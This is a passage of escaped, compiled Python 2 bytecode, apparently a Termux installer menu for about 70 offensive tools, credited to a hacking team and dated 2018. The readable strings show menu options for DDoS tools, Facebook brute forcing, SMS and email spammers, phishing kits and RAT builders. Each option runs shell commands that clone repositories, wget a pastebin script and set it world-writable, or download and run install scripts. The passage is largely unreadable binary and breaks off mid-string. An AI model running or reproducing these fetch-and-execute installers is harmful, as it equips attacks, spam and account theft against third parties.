00d\xf3\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xf4\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01n\x00\x00e\x14\x00d\xf5\x00k\x02\x00r\xf1\x0ed\xf6\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xf7\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xf8\x00k\x02\x00rX\x0fd\xf9\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfb\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfc\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfd\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xfe\x00k\x02\x00r\xb2\x0fd\xff\x00GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x00\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x01\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x02\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x03\x01k\x02\x00r\x19\x10d\x04\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x06\x01\x83\x01\x00\x0
1e\x00\x00j\x07\x00d\x07\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x08\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\t\x01k\x02\x00r\x80\x10d\n\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x0b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x0c\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\r\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x0e\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x0f\x01k\x02\x00r\xda\x10d\x10\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x11\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x12\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x13\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x14\x01k\x02\x00r4\x11d\x15\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x16\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x17\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x18\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x19\x01k\x02\x00r\x9b\x11d\x1a\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x1b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x1c\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x1d\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x1e\x01k\x02\x00r\xf5\x11d\x1f\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d 
\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d!\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d"\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d#\x01k\x02\x00rB\x12d$\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d%\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d&\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\'\x01k\x02\x00r\x8f\x12d(\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d)\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d*\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d+\x01k\x02\x00r\xdc\x12d,\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d-\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d.\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d/\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d0\x01k\x02\x00r)\x13d1\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d2\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d3\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d4\x01k\x02\x00r\x90\x13d5\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d6\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d7\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d8\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d9\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d:\x01k\x02\x00r\xea\x13d;\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d<\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d=\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d>\x01k\x02\x00rD\x14d?\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d@\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dA\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dB\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dC\x01k\x02\x00r\x9e\x14dD\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dE\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dF\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dG\x0
1\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dH\x01k\x02\x00r\xf8\x14dI\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dJ\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dK\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dL\x01k\x02\x00r_\x15dM\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d6\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dN\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dO\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dP\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dQ\x01k\x02\x00r\xc6\x15dR\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dS\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dT\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dU\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dV\x01k\x02\x00r-\x16dW\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dX\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dY\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dZ\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d[\x01k\x02\x00r\x87\x16d\\\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d]\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d^\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d_\x01k\x02\x00r\xe1\x16d`\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00da\x01\x83\x01\x00\x01e\x00\x00j\x07\x00db\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dc\x01k\x02\x00rH\x17dd\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00de\x01\x83\x01\x00\x01e\x00\x00j\x07\x00df\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dg\x01\x83\
x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01dh\x01GHn\x00\x00e\x14\x00di\x01k\x02\x00r\xa2\x17dj\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x0b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dk\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dm\x01k\x02\x00r\xfc\x17dn\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00do\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dp\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dq\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dr\x01k\x02\x00rV\x18ds\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dt\x01\x83\x01\x00\x01e\x00\x00j\x07\x00du\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dv\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00dw\x01k\x02\x00r\xb0\x18dx\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dy\x01\x83\x01\x00\x01e\x00\x00j\x07\x00dz\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d{\x01k\x02\x00r\n\x19d|\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d}\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d~\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x7f\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x80\x01k\x02\x00rd\x19d\x81\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d-\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x82\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x83\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x84\x01k\x02\x00r\xbe\x19d\x85\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00dl\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x86\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x87\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x88\x01k\x02\x00r%\x1ad\x89\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\
x00\x01e\x00\x00j\x07\x00d\x8a\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8c\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8d\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x8e\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x8f\x01k\x02\x00rr\x1ad\x90\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x91\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x92\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x93\x01k\x02\x00r\xbf\x1ad\x94\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x95\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x96\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x97\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x93\x01k\x02\x00r&\x1bd\x98\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x99\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9a\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9c\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x9d\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\x9e\x01k\x02\x00rs\x1bd\x9f\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xfa\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa0\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa1\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xa2\x01k\x02\x00r\xc0\x1bd\xa3\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa4\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa5\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa6\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xa7\x01k\x02\x00r\x1a\x1cd\xa8\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x0b\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xa9\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xaa\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xab\x01k\x02\x00r\x81\x1cd\xac\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xcc\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xad\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xae\x01
\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xaf\x01k\x02\x00r\xe8\x1cd\xb0\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb1\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb2\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb3\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xb4\x01k\x02\x00rO\x1dd\xb5\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\x05\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb6\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb7\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xb8\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xb9\x01k\x02\x00r\x9c\x1dd\xba\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d-\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xbb\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xbc\x01\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xbd\x01k\x02\x00r\xf6\x1dd\xbe\x01GHe\x00\x00j\x07\x00dj\x00\x83\x01\x00\x01e\x00\x00j\x07\x00d\xbf\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc0\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\xc1\x01\x83\x01\x00\x01e\x00\x00j\x07\x00d\x04\x00\x83\x01\x00\x01da\x00GHn\x00\x00e\x14\x00d\xc2\x01k\x02\x00s\x0e\x1ee\x14\x00d\xc2\x01k\x02\x00r\x1b\x1ee\x05\x00d\xc3\x01\x83\x01\x00\x01n\x00\x00d\x01\x00S(\xc4\x01\x00\x00i\xff\xff\xff\xffNc\x01\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00sM\x00\x00\x00xF\x00|\x00\x00d\x01\x00\x17D]:\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00t\x06\x00j\x06\x00\x83\x00\x00d\x02\x00\x14\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\x9a\x99\x99\x99\x99\x99\xb9?(\x07\x00\x00\x00t\x03\x00\x00\x00syst\x06\x00\x00\x00stdoutt\x05\x00\x00\x00writet\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleept\x06\x00\x00\x00random(\x02\x00\x00\x00t\x01\x00\x00\x00st\x01\x00\x00\x00c(\x00\x00\x00\x00(\x0
0\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00mengetik\x0f\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x02c\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s/\x00\x00\x00t\x00\x00j\x01\x00}\x00\x00t\x02\x00j\x03\x00|\x00\x00|\x00\x00t\x00\x00j\x04\x00\x8c\x02\x00\x01t\x02\x00j\x05\x00\x83\x00\x00}\x01\x00d\x00\x00S(\x01\x00\x00\x00N(\x06\x00\x00\x00R\x00\x00\x00\x00t\n\x00\x00\x00executablet\x02\x00\x00\x00ost\x05\x00\x00\x00execlt\x04\x00\x00\x00argvt\x06\x00\x00\x00getcwd(\x02\x00\x00\x00t\x06\x00\x00\x00pythont\x06\x00\x00\x00curdir(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x0f\x00\x00\x00restart_program\x15\x00\x00\x00s\x06\x00\x00\x00\x00\x01\t\x01\x16\x01t\x05\x00\x00\x00clears\x04\x00\x00\x00\x1b[0ms\x05\x00\x00\x00\x1b[31ms\x05\x00\x00\x00\x1b[32ms\x08\x00\x00\x00\x1b[01;33ms\x07\x00\x00\x00\x1b[1;34ms\x05\x00\x00\x00\x1b[35ms\x05\x00\x00\x00\x1b[36ms\x05\x00\x00\x00\x1b[37ms\x05\x00\x00\x00\x1b[93ms\x07\x00\x00\x00\x1b[1;91ms\x05\x00\x00\x00\x1b[33ms\xbf\x01\x00\x00 \n :::::::: ::: ::: ::: :::::::: Author : Xeit666h05t\n :+: :+: :+: :+: :+:+: :+: :+: Team : CoiZter_Team\n +:+ +:+ +:+ +:+ +:+ +:+ Support Team : BlackHole Security\n +#+ +#++:++ +#+ +#++:++# Date : 08 April 2K18 \n +#+ +#+ +#+ +#+ +#+ +#+ GreetZ : Takarai Crew - DeadSecTL\n #+# #+# #+# #+# #+# #+# \n########## ### ### ####### ########s\x06\x00\x00\x002K18~#s\x13\x00\x00\x00 [01].Hammer s\x18\x00\x00\x00 [02].Spammer-Grabs\x16\x00\x00\x00 [03].Red Hawk s\x19\x00\x00\x00 [04].Galau Tools s#\x00\x00\x00 [05].Facebook Brute Force s\x14\x00\x00\x00 [06].Webdav s#\x00\x00\x00 [07].Metasploit s\x19\x00\x00\x00 [08].KaliNethunters\x12\x00\x00\x00 [09].Infogas\x12\x00\x00\x00 [10].D-Tects\x11\x00\x00\x00 [11].Hydras\x12\x00\x00\x00 [12].SQLMaps\x14\x00\x00\x00 [13].WFDroid s\x11\x00\x00\x00 [14].viSQLs\x17\x00\x00\x00 [15].The Fat Rats\x17\x00\x00\x00 [16].aircrack-ngs\x14\x00\x00\x00 [17].joomscans\x17\x00\x00\x00 [18].Cms Scanners\x19\x00\x00\x00 
[19].IPGeolocations\x18\x00\x00\x00 [20].RouterSploits\x12\x00\x00\x00 [21].Xerxess\x17\x00\x00\x00 [22].Hash-Busters\x14\x00\x00\x00 [23].LITEDDOSs\x1a\x00\x00\x00 [24].HakkuFrameworks\x18\x00\x00\x00 [25].Admin Finders\x13\x00\x00\x00 [26].EvilURLs\x17\x00\x00\x00 [27].AndroZenMaps\x10\x00\x00\x00 [28].Nmaps\x13\x00\x00\x00 [29].Sqlmates\x15\x00\x00\x00 [30].Astranmaps\x0f\x00\x00\x00 [31].WTFs\x13\x00\x00\x00 [32].Easymaps\x10\x00\x00\x00 [33].XD3vs\x11\x00\x00\x00 [34].Cripss\x0f\x00\x00\x00 [35].SIRs\x13\x00\x00\x00 [36].Strikers\x10\x00\x00\x00 [37].DSSSs\x11\x00\x00\x00 [38].SQLivs\x13\x00\x00\x00 [39].SqlScans\x16\x00\x00\x00 [40].Golden Eyes\x11\x00\x00\x00 [41].XGanss\x1b\x00\x00\x00 [42].Planetwork-DDOSs\x14\x00\x00\x00 [43].BlackBoxs\x17\x00\x00\x00 [44].Black Hydras\x14\x00\x00\x00 [45].WPSploits\x13\x00\x00\x00 [46].SqlDumps\x15\x00\x00\x00 [47].WebSploits\x16\x00\x00\x00 [48].Sql Lokmeds\x12\x00\x00\x00 [49].Brutals\x11\x00\x00\x00 [50].A-Rats\x15\x00\x00\x00 [51].KnockMails\x0f\x00\x00\x00 [52].Hacs\x19\x00\x00\x00 [53].Spammer Emails\x12\x00\x00\x00 [54].Rang3rs\x11\x00\x00\x00 [55].SH33Ls\x1e\x00\x00\x00 [56].Social-Engineerings\x15\x00\x00\x00 [57].SpiderBots\x11\x00\x00\x00 [58].Ngroks\x10\x00\x00\x00 [59].Sudos\x12\x00\x00\x00 [60].Ubuntus\x12\x00\x00\x00 [61].Fedoras\x15\x00\x00\x00 [62].XAttackers\x10\x00\x00\x00 [63].VCRTs\x16\x00\x00\x00 [64].SocialFishs\x11\x00\x00\x00 [65].ECodes\x13\x00\x00\x00 [66].Hashzers\x14\x00\x00\x00 [67].XSStrikes\x14\x00\x00\x00 [68].Breachers\x13\x00\x00\x00 [69].PassGens\x13\x00\x00\x00 [70].SpazSMSs\x11\x00\x00\x00 [99].ExitZt\x02\x00\x00\x0001t\x01\x00\x00\x001s\x0e\x00\x00\x00Install Hammers\n\x00\x00\x00pkg updates\x0b\x00\x00\x00pkg upgrades\x12\x00\x00\x00pkg install pythons\x0f\x00\x00\x00pkg install gits)\x00\x00\x00git clone https://github.com/cyweb/hammers\x08\x00\x00\x00Done 0cet\x02\x00\x00\x0002t\x01\x00\x00\x002s\x14\x00\x00\x00Install Spammer-Grabs\x19\x00\x00\x00pkg update && pkg 
upgrades3\x00\x00\x00git clone https://github.com/p4kl0nc4t/Spammer-Grabt\x02\x00\x00\x0003t\x01\x00\x00\x003s\x14\x00\x00\x00Install RedHawk Euyys\x19\x00\x00\x00apt update && apt upgrades\x0f\x00\x00\x00apt install phps\x0f\x00\x00\x00apt install gits2\x00\x00\x00git clone https://github.com/Tuhinshubhra/RED_HAWKt\x02\x00\x00\x0004t\x01\x00\x00\x004s\x13\x00\x00\x00Install Galau Toolss\x13\x00\x00\x00pkg install python2s8\x00\x00\x00git clone https://github.com/DaffaTakarai/AutoGalauToolst\x02\x00\x00\x0005t\x01\x00\x00\x005s\x1b\x00\x00\x00Install Facebook BruteForces\x17\x00\x00\x00apt install python2-devs\x10\x00\x00\x00apt install wgets\x16\x00\x00\x00pip2 install mechanizes4\x00\x00\x00git clone https://github.com/DaffaTakarai/XEIT_Cybert\x02\x00\x00\x0006t\x01\x00\x00\x006s\x0e\x00\x00\x00Install Webdavs\x12\x00\x00\x00apt install pythons\x1a\x00\x00\x00apt-get install python-pips2\x00\x00\x00pip2 install urllib3 chardet certifi idna requestss\x18\x00\x00\x00apt install openssl curls\x13\x00\x00\x00pkg install libcurls\x0c\x00\x00\x00mkdir webdavs\x0b\x00\x00\x00cd ~/webdavs4\x00\x00\x00wget https://pastebin.com/raw/HnVyQPtR -O webdav.py s\x13\x00\x00\x00chmod 777 webdav.pys\x05\x00\x00\x00cd ~/t\x02\x00\x00\x0007t\x01\x00\x00\x007s\x16\x00\x00\x00Install Metasploit EuysT\x00\x00\x00wget https://raw.githubusercontent.com/verluchie/termux-metasploit/master/install.shs\x14\x00\x00\x00chmod 777 install.shs\r\x00\x00\x00sh install.sht\x02\x00\x00\x0008t\x01\x00\x00\x008s\x15\x00\x00\x00Install KaliNethunters;\x00\x00\x00git clone https://github.com/Hax4us/Nethunter-In-Termux.gits\x18\x00\x00\x00cd ~/Nethunter-In-Termuxs\x17\x00\x00\x00chmod 777 kalinethunters\x10\x00\x00\x00sh kalinethuntert\x01\x00\x00\x009s\x0e\x00\x00\x00Install Infogas5\x00\x00\x00git clone https://github.com/m4ll0k/Infoga.git infogas\t\x00\x00\x00cd infogas\x12\x00\x00\x00pip install -r reqt\x02\x00\x00\x0010s\x0e\x00\x00\x00Install D-Tects\x16\x00\x00\x00apt-get install 
pythons\x13\x00\x00\x00apt-get install gits;\x00\x00\x00git clone https://github.com/shawarkhanethicalhacker/D-TECTt\x02\x00\x00\x0011s\r\x00\x00\x00Install Hydras!\x00\x00\x00apt update && apt install -y wgets\x11\x00\x00\x00apt install hydrasK\x00\x00\x00wget http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txtt\x02\x00\x00\x0012t\x02\x00\x00\x0013s\x0e\x00\x00\x00Install SqlMaps\x13\x00\x00\x00apt install python2s5\x00\x00\x00git clone https://github.com/sqlmapproject/sqlmap.gits\x0f\x00\x00\x00Install WFDroids\r\x00\x00\x00mkdir wfdroids\x0c\x00\x00\x00cd ~/wfdroidsQ\x00\x00\x00wget https://raw.githubusercontent.com/bytezcrew/wfdroid-termux/master/wfdinstalls\x14\x00\x00\x00chmod 777 wfdinstalls\r\x00\x00\x00sh wfdinstallt\x02\x00\x00\x0014s\r\x00\x00\x00Install viSQLs\n\x00\x00\x00apt updates,\x00\x00\x00git clone https://github.com/blackvkng/viSQLs\x08\x00\x00\x00cd viSQLs*\x00\x00\x00python2 -m pip install -r requirements.txtt\x02\x00\x00\x0015s\x13\x00\x00\x00Install The Fat Rats!\x00\x00\x00apt-get update && apt-get upgrades4\x00\x00\x00git clone https://github.com/Screetsec/TheFatRat.gits\x0c\x00\x00\x00cd TheFatRats\x1f\x00\x00\x00chmod +x setup.sh && ./setup.sht\x02\x00\x00\x0016s\x12\x00\x00\x00Install AirCrak-ngs\x1b\x00\x00\x00apt-get install aircrack-ngt\x02\x00\x00\x0017s\x10\x00\x00\x00Install JoomScans\x14\x00\x00\x00apt-get install perls0\x00\x00\x00git clone https://github.com/rezasp/joomscan.gitt\x02\x00\x00\x0018s\x13\x00\x00\x00Install Cms Scanners/\x00\x00\x00git clone https://github.com/Dionach/CMSmap.gitt\x02\x00\x00\x0019s\x15\x00\x00\x00Install IPGeolocations7\x00\x00\x00git clone https://github.com/maldevel/IPGeolocation.gits\x10\x00\x00\x00cd IPGeolocations\x19\x00\x00\x00chmod +x ipgeolocation.pys\x1f\x00\x00\x00pip install -r requirements.txtt\x02\x00\x00\x0020s\x14\x00\x00\x00Install RouterSploits\x15\x00\x00\x00pip2 install requestss;\x00\x00\x00git clone 
